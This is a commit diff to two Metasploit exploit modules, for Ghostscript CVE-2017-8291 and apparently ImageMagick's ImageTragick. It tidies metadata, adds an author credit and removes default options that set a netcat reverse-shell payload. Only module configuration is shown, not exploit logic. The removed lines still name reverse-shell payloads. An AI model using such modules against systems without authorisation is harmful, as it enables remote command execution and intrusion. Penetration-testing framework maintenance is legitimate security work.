parent
d25aad571f
commit
13ff71b879
|
@ -10,18 +10,18 @@ class MetasploitModule < Msf::Exploit
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a type confusion vulnerability in Ghostscript that can
|
||||
be exploited to obtain arbitrary command execution. This vulnerability affects
|
||||
Ghostscript version 9.21 and earlier and can be exploited through libraries
|
||||
such as ImageMagick and Pillow.
|
||||
},
|
||||
'Author' => [
|
||||
'Author' => [
|
||||
'Atlassian Security Team', # Vulnerability discovery
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
'References' => [
|
||||
%w{AKA ghostbutt},
|
||||
%w{CVE 2017-8291},
|
||||
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
|
||||
|
@ -29,28 +29,18 @@ class MetasploitModule < Msf::Exploit
|
|||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
|
||||
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
|
||||
],
|
||||
'DisclosureDate' => 'Apr 27 2017',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic netcat bash-tcp'
|
||||
}
|
||||
'DisclosureDate' => 'Apr 27 2017',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' => {
|
||||
'BadChars' => "\x22\x27\x5c)(" # ", ', \, (, and )
|
||||
},
|
||||
'Targets' => [
|
||||
'Targets' => [
|
||||
['EPS file', template: 'msf.eps']
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat',
|
||||
'LHOST' => Rex::Socket.source_address,
|
||||
'DisablePayloadHandler' => false,
|
||||
'WfsDelay' => 9001
|
||||
}
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit
|
|||
'Author' => [
|
||||
'stewie', # Vulnerability discovery
|
||||
'Nikolay Ermishkin', # Vulnerability discovery
|
||||
'Tavis Ormandy', # Vulnerability discovery
|
||||
'wvu', # Metasploit module
|
||||
'hdm' # Metasploit module
|
||||
],
|
||||
|
@ -41,7 +42,8 @@ class MetasploitModule < Msf::Exploit
|
|||
%w{URL http://seclists.org/oss-sec/2016/q3/682},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
|
||||
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
|
||||
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
|
||||
%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669},
|
||||
%w{AKA ImageTragick}
|
||||
],
|
||||
'DisclosureDate' => 'May 3 2016',
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
Loading…
Reference in New Issue